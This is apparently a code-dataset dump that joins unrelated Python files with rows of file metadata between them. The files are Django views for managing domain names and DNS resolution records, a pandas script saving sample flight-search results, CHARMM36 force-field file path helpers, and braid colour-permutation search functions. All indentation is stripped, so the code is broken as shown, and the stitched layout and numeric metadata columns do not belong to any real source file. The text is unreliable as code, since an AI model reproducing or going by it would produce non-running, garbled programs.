return HttpResponse('{"status":"success", "msg":"Domain name updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete domain name
######################################
class DeleteDomainNameView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameInfo.objects.get(id=int(request.POST.get('do_id')))
domain_info.update_user = request.user
domain_info.status = 0
domain_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 4
op_record.action = "Disabled domain name: %s" % domain_info.name
op_record.save()
return HttpResponse('{"status":"success", "msg":"Domain name disabled successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Domain name resolution list
######################################
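# A resolution record maps a subdomain label (name) under a parent
# DomainNameInfo to an IP; audit strings render it as "name.domain".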
class DomainNameResolveListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'port_domain'
web_chose_left_2 = 'domain_resolve'
web_chose_middle = ''
records = DomainNameResolveInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(Q(ip=keyword) | Q(domain_name__name__icontains=keyword) | Q(desc__icontains=keyword))
# Count
record_nums = records.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(records, 16, request=request)
# The paginated QuerySet
records = p.page(page)
domains = DomainNameInfo.objects.filter(status=1)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
'domains': domains,
}
return render(request, 'host_management/port/domain_name_resolve_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add domain name resolution
######################################
class AddDomainNameResolveView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
name = request.POST.get('name')
domain_name_id = int(request.POST.get('domain_name'))
if DomainNameResolveInfo.objects.filter(name=name).filter(domain_name_id=domain_name_id).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_domain_resolve_form = AddDomainNameResolveForm(request.POST)
if add_domain_resolve_form.is_valid():
domain_info = DomainNameResolveInfo()
domain_info.name = name
domain_info.domain_name_id = domain_name_id
domain_info.desc = request.POST.get('desc', '')
domain_info.ip = request.POST.get('ip')
domain_info.add_user = request.user
domain_info.update_user = request.user
domain_info.status = 1
domain_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 1
op_record.action = "Added domain resolution: %s.%s" % (domain_info.name, domain_info.domain_name.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Domain resolution added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit domain name resolution
######################################
class EditDomainNameResolveView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameResolveInfo.objects.get(id=int(request.POST.get('do_id')))
name = request.POST.get('name')
domain_name_id = int(request.POST.get('domain_name'))
# Check for duplicates only when the (name, domain) pair actually changes; "or" is
# used so that a change to either field triggers the uniqueness check.
if (domain_info.name != name) or (domain_info.domain_name_id != domain_name_id):
if DomainNameResolveInfo.objects.filter(name=name).filter(domain_name_id=domain_name_id).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
edit_domain_resolve_form = EditDomainNameResolveForm(request.POST)
if edit_domain_resolve_form.is_valid():
domain_info.name = name
domain_info.domain_name_id = domain_name_id
domain_info.ip = request.POST.get('ip')
domain_info.desc = request.POST.get('desc', '')
domain_info.update_user = request.user
domain_info.save()
# Add an operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 2
op_record.action = "Edited domain name resolution: %s.%s" % (domain_info.name, domain_info.domain_name.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Domain name resolution updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete domain name resolution
######################################
class DeleteDomainNameResolveView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameResolveInfo.objects.get(id=int(request.POST.get('do_id')))
domain_info.update_user = request.user
domain_info.status = 0
domain_info.save()
# Add an operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 4
op_record.action = "Disabled domain name resolution: %s.%s" % (domain_info.name, domain_info.domain_name.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Domain name resolution disabled successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
| 37.906869
| 139
| 0.516058
| 9,128
| 89,953
| 4.867331
| 0.050394
| 0.060501
| 0.063022
| 0.053839
| 0.850165
| 0.825992
| 0.795854
| 0.77616
| 0.747057
| 0.712845
| 0
| 0.009103
| 0.318522
| 89,953
| 2,372
| 140
| 37.92285
| 0.715665
| 0.018321
| 0
| 0.711372
| 0
| 0
| 0.11163
| 0.009965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035229
| false
| 0.008035
| 0.008035
| 0
| 0.176143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1286264ce1a2a5e202601ed2ba724cf5f1fb1b7a
| 9,138
|
py
|
Python
|
app/pandas_storedata.py
|
StefanEkstromFFCG/FlightPlanner
|
c5925482536c893b371dff71214f1e2794974ad2
|
[
"Apache-2.0"
] | null | null | null |
app/pandas_storedata.py
|
StefanEkstromFFCG/FlightPlanner
|
c5925482536c893b371dff71214f1e2794974ad2
|
[
"Apache-2.0"
] | null | null | null |
app/pandas_storedata.py
|
StefanEkstromFFCG/FlightPlanner
|
c5925482536c893b371dff71214f1e2794974ad2
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
testdata = [{
"mapIdfrom": "stockholm",
"duration": {
"total": 9600,
"return": 0,
"departure": 9600
},
"flyTo": "BSL",
"conversion": {
"EUR": 100
},
"deep_link": "https://www.kiwi.com/deep?from=ARN&to=BSL&departure=08-02-2018&flightsId=3532731584995748_0&price=100&passengers=1&affilid=picky&lang=en&currency=EUR&booking_token=TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795hlDRZUq8aCyCTw4fdhJod+M1d5SBkLVg1lwCO7BMx27VCT3Q9Hrva2qEgOjLlVpj5UudFifyQk06/Q1fRgpWMLttxF/Rsa2KFpHeNOBIAe8qD3iItXqXEOyyBLNe/haERG1OWSTyvCq0tBWL307IfhOOb/DvWplr5UUU1EjUQqHdglL60JkUQRooqwhV2E4FEXciLiRSaK66yHDlJBfMlJNu2ZWjmfOOVknbosUTEv40cp+L4ujUbjyPIqW50Lv1gN6443+ogkBUD3/EKK5CuubyI5IkNZfE8G1bec/+0640LK4uy57LwHKHAxqijH8LPfeLrTPRdGJuLsDOP5lBqv4sVSPiyq/Ocp7Q3QbLvYhvPWK/n/+b2QNso+hFxyPNXe+9dN+ZS7BbSTIlR6TJY8eUGEPCf8kUnAlSewkkxOkFiD4lqpthuVth+YP1BjWNUU/BarAis3V+5Xxj39SwPLl+DQWA9EGNeylyvC6suUVs22YnVIKkt8Wf2vMH3JAoggmT/MWB0xXq7XyWwb1s/eBB3I7cmZTMpW/Hk5yWM+VD0WnjRSaLL6i1ZC01B829U=",
"mapIdto": "freiburg",
"nightsInDest": None,
"airlines": [
"U2"
],
"id": "3532731584995748_0",
"facilitated_booking_available": True,
"pnr_count": 1,
"fly_duration": "2h 40m",
"countryTo": {
"code": "CH",
"name": "Switzerland"
},
"baglimit": {
"hand_width": 45,
"hand_length": 56,
"hold_weight": 15,
"hand_height": 25,
"hand_weight": 15
},
"aTimeUTC": 1518123000,
"p3": 1,
"price": 100,
"type_flights": [
"lcc-U2"
],
"bags_price": {
"1": 21,
"2": 46
},
"cityTo": "Basel",
"transfers": [],
"flyFrom": "ARN",
"dTimeUTC": 1518113400,
"p2": 1,
"countryFrom": {
"code": "SE",
"name": "Sweden"
},
"p1": 1,
"dTime": 1518117000,
"found_on": [
"deprecated"
],
"booking_token": "TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795hlDRZUq8aCyCTw4fdhJod+M1d5SBkLVg1lwCO7BMx27VCT3Q9Hrva2qEgOjLlVpj5UudFifyQk06/Q1fRgpWMLttxF/Rsa2KFpHeNOBIAe8qD3iItXqXEOyyBLNe/haERG1OWSTyvCq0tBWL307IfhOOb/DvWplr5UUU1EjUQqHdglL60JkUQRooqwhV2E4FEXciLiRSaK66yHDlJBfMlJNu2ZWjmfOOVknbosUTEv40cp+L4ujUbjyPIqW50Lv1gN6443+ogkBUD3/EKK5CuubyI5IkNZfE8G1bec/+0640LK4uy57LwHKHAxqijH8LPfeLrTPRdGJuLsDOP5lBqv4sVSPiyq/Ocp7Q3QbLvYhvPWK/n/+b2QNso+hFxyPNXe+9dN+ZS7BbSTIlR6TJY8eUGEPCf8kUnAlSewkkxOkFiD4lqpthuVth+YP1BjWNUU/BarAis3V+5Xxj39SwPLl+DQWA9EGNeylyvC6suUVs22YnVIKkt8Wf2vMH3JAoggmT/MWB0xXq7XyWwb1s/eBB3I7cmZTMpW/Hk5yWM+VD0WnjRSaLL6i1ZC01B829U=",
"routes": [
[
"ARN",
"BSL"
]
],
"cityFrom": "Stockholm",
"aTime": 1518126600,
"route": [
{
"bags_recheck_required": False,
"mapIdfrom": "stockholm",
"flight_no": 1146,
"original_return": 0,
"lngFrom": 17.918611,
"flyTo": "BSL",
"guarantee": False,
"latTo": 47.601111,
"source": "deprecated",
"combination_id": "3532731584995748",
"id": "3532731584995748_0",
"latFrom": 59.651944,
"lngTo": 7.521667,
"dTimeUTC": 1518113400,
"aTimeUTC": 1518123000,
"return": 0,
"price": 1,
"cityTo": "Basel",
"vehicle_type": "aircraft",
"flyFrom": "ARN",
"mapIdto": "freiburg",
"dTime": 1518117000,
"found_on": "deprecated",
"airline": "U2",
"cityFrom": "Stockholm",
"aTime": 1518126600
}
],
"distance": 1502.8
},
{
"mapIdfrom": "stockholm",
"duration": {
"total": 10200,
"return": 0,
"departure": 10200
},
"flyTo": "BRS",
"conversion": {
"EUR": 100
},
"deep_link": "https://www.kiwi.com/deep?from=ARN&to=BRS&departure=08-02-2018&flightsId=3527234017512062_0&price=100&passengers=1&affilid=picky&lang=en&currency=EUR&booking_token=TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795jwlbK911PNijl7eYOxulSkGzHpDCd7mD9Y/laljq7gTs6z4I1/tScNq7YubfKhvw5xy22gpuARChyVFi4o6pGAGkOrPNHvbiWFuQ8YEP2yjahIiMrB3f6AOUxXUnw9CmRW2h+gXbT/0NL9UwmzZu9+czI1en1oHWiSdEYicuOJH1fxPkwjh66dGEu3CevHFJnSsh86lT6mUOag1lVfKBQsEFT02zxluNvhIuoI2q988qo+oLx7k6xVYPZ+WcD9GPdNvLWy9jhjNqhe+RYQUX9F4jIg0LdgwqlBDjt1999qCoRMf/4W4nG45Eb8FmTmv6yNh92S34XvlBdzwO35RHRoL5vVygXBMZ6i+kav2MXohRAb1TDrkc/UXdbLqMDGjlWfrofFzJxAPYL+oWQgKKI+Exk1WNndH2SHYAtFs0KnTLFciX+aMHB1EH0oILdTpqp0hJRsd9Qd4YV8rZ0WzJR4wKtpAud6/WsIKGRLBbO6qRMhH02iHAJ1hVOKbW2vJZlY8nyxZ5atxs8G7eQsPEgunCUbCyV5GPVzt6vvpgDHZhG4AzDBdq+5i464um0OcAE=",
"mapIdto": "bristol",
"nightsInDest": None,
"airlines": [
"U2"
],
"id": "3527234017512062_0",
"facilitated_booking_available": True,
"pnr_count": 1,
"fly_duration": "2h 50m",
"countryTo": {
"code": "GB",
"name": "United Kingdom"
},
"baglimit": {
"hand_width": 45,
"hand_length": 56,
"hold_weight": 15,
"hand_height": 25,
"hand_weight": 15
},
"aTimeUTC": 1518116100,
"p3": 1,
"price": 100,
"type_flights": [
"lcc-U2"
],
"bags_price": {
"1": 21,
"2": 46
},
"cityTo": "Bristol",
"transfers": [],
"flyFrom": "ARN",
"dTimeUTC": 1518105900,
"p2": 1,
"countryFrom": {
"code": "SE",
"name": "Sweden"
},
"p1": 1,
"dTime": 1518109500,
"found_on": [
"deprecated"
],
"booking_token": "TjFsU9KOyjpEDqm5dNSrO1ZjuRMVMgZrERrSppD325T6P8+P9w468E+3gYirNKm0xjFEaQ8brFkJXYHcFnHHQMiKg0Dkoaiav5UhUit795jwlbK911PNijl7eYOxulSkGzHpDCd7mD9Y/laljq7gTs6z4I1/tScNq7YubfKhvw5xy22gpuARChyVFi4o6pGAGkOrPNHvbiWFuQ8YEP2yjahIiMrB3f6AOUxXUnw9CmRW2h+gXbT/0NL9UwmzZu9+czI1en1oHWiSdEYicuOJH1fxPkwjh66dGEu3CevHFJnSsh86lT6mUOag1lVfKBQsEFT02zxluNvhIuoI2q988qo+oLx7k6xVYPZ+WcD9GPdNvLWy9jhjNqhe+RYQUX9F4jIg0LdgwqlBDjt1999qCoRMf/4W4nG45Eb8FmTmv6yNh92S34XvlBdzwO35RHRoL5vVygXBMZ6i+kav2MXohRAb1TDrkc/UXdbLqMDGjlWfrofFzJxAPYL+oWQgKKI+Exk1WNndH2SHYAtFs0KnTLFciX+aMHB1EH0oILdTpqp0hJRsd9Qd4YV8rZ0WzJR4wKtpAud6/WsIKGRLBbO6qRMhH02iHAJ1hVOKbW2vJZlY8nyxZ5atxs8G7eQsPEgunCUbCyV5GPVzt6vvpgDHZhG4AzDBdq+5i464um0OcAE=",
"routes": [
[
"ARN",
"BRS"
]
],
"cityFrom": "Stockholm",
"aTime": 1518116100,
"route": [
{
"bags_recheck_required": False,
"mapIdfrom": "stockholm",
"flight_no": 6034,
"original_return": 0,
"lngFrom": 17.918611,
"flyTo": "BRS",
"guarantee": False,
"latTo": 51.3825,
"source": "deprecated",
"combination_id": "3527234017512062",
"id": "3527234017512062_0",
"latFrom": 59.651944,
"lngTo": -2.718889,
"dTimeUTC": 1518105900,
"aTimeUTC": 1518116100,
"return": 0,
"price": 1,
"cityTo": "Bristol",
"vehicle_type": "aircraft",
"flyFrom": "ARN",
"mapIdto": "bristol",
"dTime": 1518109500,
"found_on": "deprecated",
"airline": "U2",
"cityFrom": "Stockholm",
"aTime": 1518116100
}
],
"distance": 1582.73
}]
df = pd.DataFrame(testdata)
df.to_csv("test_pandas.csv")
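# Read-back sketch (not part of the original script, added for illustration):
# load the CSV written above and inspect a few columns. index_col=0 assumes the
# default unnamed index column that DataFrame.to_csv writes here.
# df_check = pd.read_csv("test_pandas.csv", index_col=0)
# print(df_check[["flyFrom", "flyTo", "cityTo", "price"]])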
| 45.014778
| 876
| 0.536222
| 504
| 9,138
| 9.619048
| 0.388889
| 0.008663
| 0.047855
| 0.05363
| 0.813119
| 0.764026
| 0.749175
| 0.727723
| 0.707921
| 0.685231
| 0
| 0.162648
| 0.360144
| 9,138
| 202
| 877
| 45.237624
| 0.666496
| 0
| 0
| 0.71066
| 0
| 0.020305
| 0.509358
| 0.160665
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.010152
| 0.005076
| 0
| 0.005076
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42450d2dab6bf443dd200a22a1a1d01fb39bc542
| 7,592
|
py
|
Python
|
xtalmdscripts/buildsystem/utils.py
|
wutobias/xtalmd-scripts
|
672cb9a37ae5c396bb25a61499f58066ec5083a1
|
[
"MIT"
] | 1
|
2022-02-11T23:21:45.000Z
|
2022-02-11T23:21:45.000Z
|
xtalmdscripts/buildsystem/utils.py
|
wutobias/xtalmd-scripts
|
672cb9a37ae5c396bb25a61499f58066ec5083a1
|
[
"MIT"
] | 1
|
2022-02-23T20:09:31.000Z
|
2022-02-24T18:14:04.000Z
|
xtalmdscripts/buildsystem/utils.py
|
wutobias/xtalmd-scripts
|
672cb9a37ae5c396bb25a61499f58066ec5083a1
|
[
"MIT"
] | null | null | null |
def get_params_path_list(toppar_dir_path):
params_path_list = [
f"{toppar_dir_path}/top_all36_prot.rtf",
f"{toppar_dir_path}/par_all36m_prot.prm",
f"{toppar_dir_path}/top_all36_na.rtf",
f"{toppar_dir_path}/par_all36_na.prm",
f"{toppar_dir_path}/top_all36_carb.rtf",
f"{toppar_dir_path}/par_all36_carb.prm",
f"{toppar_dir_path}/top_all36_lipid.rtf",
f"{toppar_dir_path}/par_all36_lipid.prm",
f"{toppar_dir_path}/top_all36_cgenff.rtf",
f"{toppar_dir_path}/par_all36_cgenff.prm",
### f"{toppar_dir_path}/toppar_all36_moreions.str",
### f"{toppar_dir_path}/top_interface.rtf",
### f"{toppar_dir_path}/par_interface.prm",
### f"{toppar_dir_path}/toppar_all36_nano_lig.str",
### f"{toppar_dir_path}/toppar_all36_nano_lig_patch.str",
### f"{toppar_dir_path}/toppar_all36_synthetic_polymer.str",
### f"{toppar_dir_path}/toppar_all36_synthetic_polymer_patch.str",
### f"{toppar_dir_path}/toppar_all36_polymer_solvent.str",
### f"{toppar_dir_path}/toppar_water_ions.str",
### f"{toppar_dir_path}/toppar_dum_noble_gases.str",
### f"{toppar_dir_path}/toppar_ions_won.str",
### f"{toppar_dir_path}/toppar_all36_prot_arg0.str",
### f"{toppar_dir_path}/toppar_all36_prot_c36m_d_aminoacids.str",
### f"{toppar_dir_path}/toppar_all36_prot_fluoro_alkanes.str",
### f"{toppar_dir_path}/toppar_all36_prot_heme.str",
### f"{toppar_dir_path}/toppar_all36_prot_na_combined.str",
### f"{toppar_dir_path}/toppar_all36_prot_retinol.str",
### f"{toppar_dir_path}/toppar_all36_prot_model.str",
### f"{toppar_dir_path}/toppar_all36_prot_modify_res.str",
### f"{toppar_dir_path}/toppar_all36_na_nad_ppi.str",
### f"{toppar_dir_path}/toppar_all36_na_rna_modified.str",
### f"{toppar_dir_path}/toppar_all36_lipid_sphingo.str",
### f"{toppar_dir_path}/toppar_all36_lipid_archaeal.str",
### f"{toppar_dir_path}/toppar_all36_lipid_bacterial.str",
### f"{toppar_dir_path}/toppar_all36_lipid_cardiolipin.str",
### f"{toppar_dir_path}/toppar_all36_lipid_cholesterol.str",
### f"{toppar_dir_path}/toppar_all36_lipid_dag.str",
### f"{toppar_dir_path}/toppar_all36_lipid_inositol.str",
### f"{toppar_dir_path}/toppar_all36_lipid_lnp.str",
### f"{toppar_dir_path}/toppar_all36_lipid_lps.str",
### f"{toppar_dir_path}/toppar_all36_lipid_mycobacterial.str",
### f"{toppar_dir_path}/toppar_all36_lipid_miscellaneous.str",
### f"{toppar_dir_path}/toppar_all36_lipid_model.str",
### f"{toppar_dir_path}/toppar_all36_lipid_prot.str",
### f"{toppar_dir_path}/toppar_all36_lipid_tag.str",
### f"{toppar_dir_path}/toppar_all36_lipid_yeast.str",
### f"{toppar_dir_path}/toppar_all36_lipid_hmmm.str",
### f"{toppar_dir_path}/toppar_all36_lipid_detergent.str",
### f"{toppar_dir_path}/toppar_all36_lipid_ether.str",
### f"{toppar_dir_path}/toppar_all36_carb_glycolipid.str",
### f"{toppar_dir_path}/toppar_all36_carb_glycopeptide.str",
### f"{toppar_dir_path}/toppar_all36_carb_imlab.str",
### f"{toppar_dir_path}/toppar_all36_label_spin.str",
### f"{toppar_dir_path}/toppar_all36_label_fluorophore.str",
]
return params_path_list
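# Hedged usage sketch (not in the original module): resolve the CHARMM36
# parameter files for a local toppar directory and report any that are missing
# before handing them to CHARMM. The "toppar" directory name is only an
# illustrative assumption.
# import os
# params = get_params_path_list("toppar")
# missing = [p for p in params if not os.path.isfile(p)]
# print("found %d of %d parameter files" % (len(params) - len(missing), len(params)))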
def get_charmm_inp_header(toppar_dir_path):
charmm_inp_header = f"""
! protein topology and parameter
open read card unit 10 name {toppar_dir_path}/top_all36_prot.rtf
read rtf card unit 10
open read card unit 20 name {toppar_dir_path}/par_all36m_prot.prm
read para card unit 20 flex
! nucleic acids
open read card unit 10 name {toppar_dir_path}/top_all36_na.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_na.prm
read para card unit 20 append flex
! carbohydrates
open read card unit 10 name {toppar_dir_path}/top_all36_carb.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_carb.prm
read para card unit 20 append flex
! lipids
open read card unit 10 name {toppar_dir_path}/top_all36_lipid.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_lipid.prm
read para card unit 20 append flex
! CGENFF
open read card unit 10 name {toppar_dir_path}/top_all36_cgenff.rtf
read rtf card unit 10 append
open read card unit 20 name {toppar_dir_path}/par_all36_cgenff.prm
read para card unit 20 append flex
!!!
!!!
!!! ! Phosphates and Sulfates
!!! !stream {toppar_dir_path}/toppar_all36_moreions.str
!!!
!!! ! Interface FF
!!! open read card unit 10 name {toppar_dir_path}/top_interface.rtf
!!! read rtf card unit 10 append
!!!
!!! open read card unit 10 name {toppar_dir_path}/par_interface.prm
!!! read para card unit 10 append flex
!!!
!!! stream {toppar_dir_path}/toppar_all36_nano_lig.str
!!! stream {toppar_dir_path}/toppar_all36_nano_lig_patch.str
!!!
!!! ! Additional topologies and parameters for synthetic polymer
!!! stream {toppar_dir_path}/toppar_all36_synthetic_polymer.str
!!! stream {toppar_dir_path}/toppar_all36_synthetic_polymer_patch.str
!!! stream {toppar_dir_path}/toppar_all36_polymer_solvent.str
!!!
!!! ! Additional topologies and parameters for water and ions
!!! stream {toppar_dir_path}/toppar_water_ions.str
!!! stream {toppar_dir_path}/toppar_dum_noble_gases.str
!!! stream {toppar_dir_path}/toppar_ions_won.str
!!!
!!! ! Additional topologies and parameters for protein
!!! stream {toppar_dir_path}/toppar_all36_prot_arg0.str
!!! stream {toppar_dir_path}/toppar_all36_prot_c36m_d_aminoacids.str
!!! stream {toppar_dir_path}/toppar_all36_prot_fluoro_alkanes.str
!!! stream {toppar_dir_path}/toppar_all36_prot_heme.str
!!! stream {toppar_dir_path}/toppar_all36_prot_na_combined.str
!!! stream {toppar_dir_path}/toppar_all36_prot_retinol.str
!!! stream {toppar_dir_path}/toppar_all36_prot_model.str
!!! stream {toppar_dir_path}/toppar_all36_prot_modify_res.str
!!!
!!! ! Additional topologies and parameters for nucleic acids
!!! stream {toppar_dir_path}/toppar_all36_na_nad_ppi.str
!!! stream {toppar_dir_path}/toppar_all36_na_rna_modified.str
!!!
!!! ! Additional topologies and parameters for lipids
!!! stream {toppar_dir_path}/toppar_all36_lipid_sphingo.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_archaeal.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_bacterial.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_cardiolipin.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_cholesterol.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_dag.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_inositol.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_lnp.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_lps.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_mycobacterial.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_miscellaneous.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_model.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_prot.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_tag.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_yeast.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_hmmm.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_detergent.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_ether.str
!!!
!!! ! Additional topologies and parameters for carbohydrates
!!! stream {toppar_dir_path}/toppar_all36_carb_glycolipid.str
!!! stream {toppar_dir_path}/toppar_all36_carb_glycopeptide.str
!!! stream {toppar_dir_path}/toppar_all36_carb_imlab.str
!!!
!!! ! Additional topologies and parameters for spin/fluorophore labels
!!! stream {toppar_dir_path}/toppar_all36_label_spin.str
!!! stream {toppar_dir_path}/toppar_all36_label_fluorophore.str
"""
return charmm_inp_header
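# Hedged usage sketch (illustrative only): the header string above is intended
# to be prepended to a CHARMM input script; the output file name
# "load_toppar.inp" is an assumption, not part of the original code.
# with open("load_toppar.inp", "w") as fh:
#     fh.write(get_charmm_inp_header("toppar"))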
| 43.884393
| 70
| 0.777792
| 1,185
| 7,592
| 4.525738
| 0.08692
| 0.184598
| 0.266642
| 0.297595
| 0.9394
| 0.935111
| 0.862763
| 0.753869
| 0.267947
| 0.13071
| 0
| 0.036422
| 0.09589
| 7,592
| 173
| 71
| 43.884393
| 0.744901
| 0.319547
| 0
| 0.181818
| 0
| 0
| 0.931
| 0.557566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018182
| false
| 0
| 0
| 0
| 0.036364
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c429efda4400a9a181e44af7c1b63521d43dab62
| 2,212
|
py
|
Python
|
py_knots/col_perm.py
|
Chinmaya-Kausik/py_knots
|
3c9930ea0e95f6c62da9e13eb5ffcfc0e0737f9f
|
[
"MIT"
] | null | null | null |
py_knots/col_perm.py
|
Chinmaya-Kausik/py_knots
|
3c9930ea0e95f6c62da9e13eb5ffcfc0e0737f9f
|
[
"MIT"
] | null | null | null |
py_knots/col_perm.py
|
Chinmaya-Kausik/py_knots
|
3c9930ea0e95f6c62da9e13eb5ffcfc0e0737f9f
|
[
"MIT"
] | null | null | null |
from braid import *
from sgraph import *
from typing import List, Tuple
from numpy import random
import copy
# Searches n random permutations for n=tries to find
# the one with the minimal homology basis among them
# for connected spline graphs
def find_min_perm(p: ColBraid, col_signs: List[int],
tries: int) -> Tuple[ColBraid, List[int]]:
colors = max(p.col_list)+1
col = list(range(colors))
col_list = copy.deepcopy(p.col_list)
graph = p.make_graph(col_signs)
size = len(graph.hom_basis)
good_perm = col
for i in range(tries):
perm = random.permutation(col)
new_col_list = [perm[j] for j in col_list]
new_col_signs = [col_signs[j] for j in perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
new_graph = new_p.make_graph(new_col_signs)
if(len(new_graph.hom_basis) < size):
size = len(new_graph.hom_basis)
good_perm = perm
new_col_list = [good_perm[i] for i in col_list]
new_col_signs = [col_signs[i] for i in good_perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
return (new_p, new_col_signs)
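# Hedged usage sketch (illustrative only): given a ColBraid `p` constructed
# elsewhere in the project and one sign per colour (two colours assumed here),
# sample 50 random colour permutations and keep the one whose graph has the
# smallest homology basis.
# best_braid, best_signs = find_min_perm(p, col_signs=[1, -1], tries=50)
# print(len(best_braid.make_graph(best_signs).hom_basis))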
# Searches n random permutations for n=tries to find
# the one with the minimal homology basis among them
# for spline graphs with a complete graph on colors
def find_min_perm_complete(p: ColBraid, col_signs: List[int],
tries: int) -> Tuple[ColBraid, List[int]]:
colors = max(p.col_list)+1
col = list(range(colors))
col_list = copy.deepcopy(p.col_list)
graph = p.make_graph_complete(col_signs)
size = len(graph.hom_basis)
good_perm = col
for i in range(tries):
perm = random.permutation(col)
new_col_list = [perm[j] for j in col_list]
new_col_signs = [col_signs[j] for j in perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
new_graph = new_p.make_graph_complete(new_col_signs)
if(len(new_graph.hom_basis) < size):
size = len(new_graph.hom_basis)
good_perm = perm
new_col_list = [good_perm[i] for i in col_list]
new_col_signs = [col_signs[i] for i in good_perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
return (new_p, new_col_signs)
| 29.493333
| 61
| 0.669982
| 364
| 2,212
| 3.826923
| 0.156593
| 0.100503
| 0.05743
| 0.048816
| 0.86145
| 0.86145
| 0.86145
| 0.86145
| 0.86145
| 0.86145
| 0
| 0.001181
| 0.234177
| 2,212
| 74
| 62
| 29.891892
| 0.821133
| 0.127939
| 0
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0
| 0.106383
| 0
| 0.191489
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
